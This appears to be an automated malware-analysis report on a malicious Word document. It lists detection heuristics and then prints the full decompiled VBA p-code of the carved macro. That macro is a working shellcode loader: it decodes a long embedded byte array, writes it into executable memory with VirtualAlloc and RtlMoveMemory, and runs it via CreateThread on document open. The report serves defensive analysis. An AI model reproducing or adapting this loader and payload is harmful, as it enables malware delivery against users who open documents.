MALICIOUS
242
Risk Score
Heuristics 7
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADERRaw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA native-memory callback shellcode loader critical OLE_VBA_NATIVE_MEMORY_CALLBACK_LOADERVBA auto-exec macro declares or calls native memory allocation, process-memory write/copy, and callback/timer execution APIs. This is the in-memory shellcode loader pattern: allocate writable memory, copy decoded payload bytes into it, then transfer control through a callback such as CreateTimerQueueTimer. Benign document automation does not combine these primitives.Matched line in script
' Line #1: ' FuncDefn (Function VirtualAlloc(ByVal lpAddress As Ptr) As Ptr) ' Line #2: -
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13271 bytes |
SHA-256: f911190bd2ceb9cf10fef23a8166511dc529842886815c5ce9191af67c4d9e58 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/de677edc628b4e2b896aa1101ab8d833.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 954 bytes
' Macros/VBA/NewMacros - 6601 bytes
' Line #0:
' FuncDefn (Function CreateThread(ByVal SecurityAttributes As Long) As Ptr)
' Line #1:
' FuncDefn (Function VirtualAlloc(ByVal lpAddress As Ptr) As Ptr)
' Line #2:
' FuncDefn (Function RtlMoveMemory(ByVal lDestination As Ptr) As Ptr)
' Line #3:
' FuncDefn (Function vinayagar())
' Line #4:
' Dim
' VarDefn buf (As Variant)
' Line #5:
' Dim
' VarDefn addr (As Ptr)
' Line #6:
' Dim
' VarDefn counter (As Long)
' Line #7:
' Dim
' VarDefn data (As Long)
' Line #8:
' Line #9:
' Line #10:
' LineCont 0x0044 40 00 00 00 7C 00 00 00 B8 00 00 00 F4 00 00 00 30 01 00 00 6C 01 00 00 A8 01 00 00 E4 01 00 00 20 02 00 00 5C 02 00 00 98 02 00 00 D4 02 00 00 10 03 00 00 4C 03 00 00 88 03 00 00 C4 03 00 00 00 04 00 00
' LitDI2 0x00FE
' LitDI2 0x004A
' LitDI2 0x0085
' LitDI2 0x00E6
' LitDI2 0x00F2
' LitDI2 0x00EA
' LitDI2 0x00CE
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0043
' LitDI2 0x0053
' LitDI2 0x0043
' LitDI2 0x0052
' LitDI2 0x0054
' LitDI2 0x004A
' LitDI2 0x0033
' LitDI2 0x00D4
' LitDI2 0x0067
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0054
' LitDI2 0x0062
' LitDI2 0x0053
' LitDI2 0x0058
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0054
' LitDI2 0x001A
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0054
' LitDI2 0x0022
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0074
' LitDI2 0x0052
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x004A
' LitDI2 0x0011
' LitDI2 0x00B9
' LitDI2 0x004C
' LitDI2 0x004C
' LitDI2 0x004A
' LitDI2 0x0033
' LitDI2 0x00C2
' LitDI2 0x00AE
' LitDI2 0x003E
' LitDI2 0x0063
' LitDI2 0x007E
' LitDI2 0x0004
' LitDI2 0x002E
' LitDI2 0x0022
' LitDI2 0x0043
' LitDI2 0x00C3
' LitDI2 0x00CB
' LitDI2 0x000F
' LitDI2 0x0043
' LitDI2 0x0003
' LitDI2 0x00C3
' LitDI2 0x00E4
' LitDI2 0x00EF
' LitDI2 0x0054
' LitDI2 0x0043
' LitDI2 0x0053
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0054
' LitDI2 0x0022
' LitDI2 0x008D
' LitDI2 0x0044
' LitDI2 0x003E
' LitDI2 0x004A
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x0068
' LitDI2 0x0083
' LitDI2 0x007A
' LitDI2 0x001A
' LitDI2 0x000D
' LitDI2 0x0004
' LitDI2 0x0011
' LitDI2 0x0087
' LitDI2 0x0074
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x008D
' LitDI2 0x0082
' LitDI2 0x008A
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x004A
' LitDI2 0x0087
' LitDI2 0x00C2
' LitDI2 0x0076
' LitDI2 0x0069
' LitDI2 0x004A
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x008D
' LitDI2 0x004A
' LitDI2 0x001A
' LitDI2 0x0052
' LitDI2 0x0046
' LitDI2 0x008D
' LitDI2 0x0042
' LitDI2 0x0022
' LitDI2 0x004B
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x00E5
' LitDI2 0x0058
' LitDI2 0x004A
' LitDI2 0x0001
' LitDI2 0x00CB
' LitDI2 0x0043
' LitDI2 0x008D
' LitDI2 0x0036
' LitDI2 0x008A
' LitDI2 0x004A
' LitDI2 0x0003
' LitDI2 0x00D8
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x004A
' LitDI2 0x0033
' LitDI2 0x00C2
' LitDI2 0x00AE
' LitDI2 0x0043
' LitDI2 0x00C3
' LitDI2 0x00CB
' LitDI2 0x000F
' LitDI2 0x0043
' LitDI2 0x0003
' LitDI2 0x00C3
' LitDI2 0x003A
' LitDI2 0x00E2
' LitDI2 0x0077
' LitDI2 0x00F3
' LitDI2 0x004E
' LitDI2 0x0005
' LitDI2 0x004E
' LitDI2 0x0026
' LitDI2 0x000A
' LitDI2 0x0047
' LitDI2 0x003B
' LitDI2 0x00D3
' LitDI2 0x0077
' LitDI2 0x00DA
' LitDI2 0x005A
' LitDI2 0x0046
' LitDI2 0x008D
' LitDI2 0x0042
' LitDI2 0x0026
' LitDI2 0x004B
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x0068
' LitDI2 0x0043
' LitDI2 0x008D
' LitDI2 0x000E
' LitDI2 0x004A
' LitDI2 0x0046
' LitDI2 0x008D
' LitDI2 0x0042
' LitDI2 0x001E
' LitDI2 0x004B
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x0043
' LitDI2 0x008D
' LitDI2 0x0006
' LitDI2 0x008A
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x004A
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x0060
' LitDI2 0x005B
' LitDI2 0x005C
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x0043
' LitDI2 0x005B
' LitDI2 0x0043
' LitDI2 0x005C
' LitDI2 0x004A
' LitDI2 0x0085
' LitDI2 0x00EE
' LitDI2 0x0022
' LitDI2 0x0043
' LitDI2 0x0054
' LitDI2 0x0001
' LitDI2 0x00E2
' LitDI2 0x005A
' LitDI2 0x0043
' LitDI2 0x005B
' LitDI2 0x005C
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0014
' LitDI2 0x00EB
' LitDI2 0x004D
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x005F
' LitDI2 0x004B
' LitDI2 0x00C0
' LitDI2 0x0079
' LitDI2 0x0075
' LitDI2 0x0034
' LitDI2 0x0061
' LitDI2 0x0035
' LitDI2 0x0034
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0043
' LitDI2 0x0058
' LitDI2 0x004B
' LitDI2 0x008B
' LitDI2 0x00E8
' LitDI2 0x004A
' LitDI2 0x0083
' LitDI2 0x00EE
' LitDI2 0x00A2
' LitDI2 0x0003
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x004B
' LitDI2 0x008B
' LitDI2 0x00E7
' LitDI2 0x004B
' LitDI2 0x00BE
' LitDI2 0x0004
' LitDI2 0x0002
' LitDI2 0x0003
' LitDI2 0x00BD
' LitDI2 0x00C2
' LitDI2 0x00AA
' LitDI2 0x0002
' LitDI2 0x0006
' LitDI2 0x0043
' LitDI2 0x0056
' LitDI2 0x004B
' LitDI2 0x008B
' LitDI2 0x00E6
' LitDI2 0x004E
' LitDI2 0x008B
' LitDI2 0x00F3
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x004E
' LitDI2 0x0079
' LitDI2 0x0028
' LitDI2 0x0009
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x004E
' LitDI2 0x008B
' LitDI2 0x00EC
' LitDI2 0x006A
' LitDI2 0x0003
' LitDI2 0x0003
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x005B
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x002B
' LitDI2 0x0082
' LitDI2 0x006D
' LitDI2 0x0002
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x006C
' LitDI2 0x000C
' LitDI2 0x0043
' LitDI2 0x0060
' LitDI2 0x0052
' LitDI2 0x0052
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00C2
' LitDI2 0x004A
' LitDI2 0x0001
' LitDI2 0x00C2
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00C4
' LitDI2 0x004A
' LitDI2 0x0001
' LitDI2 0x00C2
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00C3
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x00EC
' LitDI2 0x0011
' LitDI2 0x00E1
' LitDI2 0x00E2
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00C9
' LitDI2 0x006C
' LitDI2 0x0012
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x004E
' LitDI2 0x008B
' LitDI2 0x00E4
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00FB
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x009B
' LitDI2 0x00A7
' LitDI2 0x0076
' LitDI2 0x0063
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x0087
' LitDI2 0x00C2
' LitDI2 0x0076
' LitDI2 0x000C
' LitDI2 0x004B
' LitDI2 0x0001
' LitDI2 0x00D0
' LitDI2 0x0077
' LitDI2 0x00E7
' LitDI2 0x00EA
' LitDI2 0x0095
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x004A
' LitDI2 0x0085
' LitDI2 0x00EE
' LitDI2 0x0012
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00E4
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x006C
' LitDI2 0x0006
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00FB
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x0004
' LitDI2 0x00DB
' LitDI2 0x00CA
' LitDI2 0x0061
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x0085
' LitDI2 0x00FA
' LitDI2 0x0002
' LitDI2 0x0080
' LitDI2 0x0057
' LitDI2 0x004A
' LitDI2 0x0085
' LitDI2 0x00C6
' LitDI2 0x0022
' LitDI2 0x0060
' LitDI2 0x008B
' LitDI2 0x00F8
' LitDI2 0x006C
' LitDI2 0x0042
' LitDI2 0x0043
' LitDI2 0x005B
' LitDI2 0x006A
' LitDI2 0x0002
' LitDI2 0x0012
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00F4
' LitDI2 0x004A
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x005A
' LitDI2 0x00A6
' LitDI2 0x0055
' LitDI2 0x00E7
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00C5
' LitDI2 0x004B
' LitDI2 0x008B
' LitDI2 0x00C9
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x004B
' LitDI2 0x008B
' LitDI2 0x00F2
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00DC
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00FB
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x0004
' LitDI2 0x00DB
' LitDI2 0x00CA
' LitDI2 0x0061
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x0085
' LitDI2 0x00FA
' LitDI2 0x0002
' LitDI2 0x007F
' LitDI2 0x002A
' LitDI2 0x005A
' LitDI2 0x0043
' LitDI2 0x0059
' LitDI2 0x005B
' LitDI2 0x006A
' LitDI2 0x0002
' LitDI2 0x0042
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x006C
' LitDI2 0x0002
' LitDI2 0x005C
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x000D
' LitDI2 0x0031
' LitDI2 0x0011
' LitDI2 0x0032
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x0059
' LitDI2 0x005B
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x0077
' LitDI2 0x0070
' LitDI2 0x004F
' LitDI2 0x0063
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x004B
' LitDI2 0x0001
' LitDI2 0x00D0
' LitDI2 0x00EB
' LitDI2 0x003E
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x004A
' LitDI2 0x0003
' LitDI2 0x00C5
' LitDI2 0x004A
' LitDI2 0x002B
' LitDI2 0x00C8
' LitDI2 0x004A
' LitDI2 0x0087
' LitDI2 0x00F8
' LitDI2 0x0077
' LitDI2 0x00B6
' LitDI2 0x0043
' LitDI2 0x0001
' LitDI2 0x00E9
' LitDI2 0x005A
' LitDI2 0x006C
' LitDI2 0x0002
' LitDI2 0x005B
' LitDI2 0x00BD
' LitDI2 0x00E2
' LitDI2 0x001F
' LitDI2 0x002C
' LitDI2 0x000C
' LitDI2 0x0043
' LitDI2 0x008B
' LitDI2 0x00DC
' LitDI2 0x0001
' LitDI2 0x00D7
' ArgsArray Array 0x01FF
' St buf
' Line #11:
' Line #12:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' Ld buf
' FnUBound 0x0000
' For
' Line #13:
' Ld i
' ArgsLd buf 0x0001
' LitDI2 0x0002
' Sub
' Ld i
' ArgsSt buf 0x0001
' Line #14:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #15:
' Line #16:
' LitDI2 0x0000
' Ld buf
' FnUBound 0x0000
' LitHI2 0x3000
' LitHI2 0x0040
' ArgsLd VirtualAlloc 0x0004
' St addr
' Line #17:
' StartForVariable
' Ld counter
' EndForVariable
' Ld buf
' FnLBound 0x0000
' Ld buf
' FnUBound 0x0000
' For
' Line #18:
' Ld counter
' ArgsLd buf 0x0001
' St data
' Line #19:
' Ld addr
' Ld counter
' Add
' Ld data
' LitDI2 0x0001
' ArgsLd RtlMoveMemory 0x0003
' St res
' Line #20:
' StartForVariable
' Ld counter
' EndForVariable
' NextVar
' Line #21:
' LitDI2 0x0000
' LitDI2 0x0000
' Ld addr
' LitDI2 0x0000
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsLd CreateThread 0x0006
' St res
' Line #22:
' EndFunc
' Line #23:
' FuncDefn (Sub Document_Open())
' Line #24:
' ArgsCall vinayagar 0x0000
' Line #25:
' EndSub
' Line #26:
' FuncDefn (Sub AutoOpen())
' Line #27:
' ArgsCall vinayagar 0x0000
' Line #28:
' EndSub
' Line #29:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.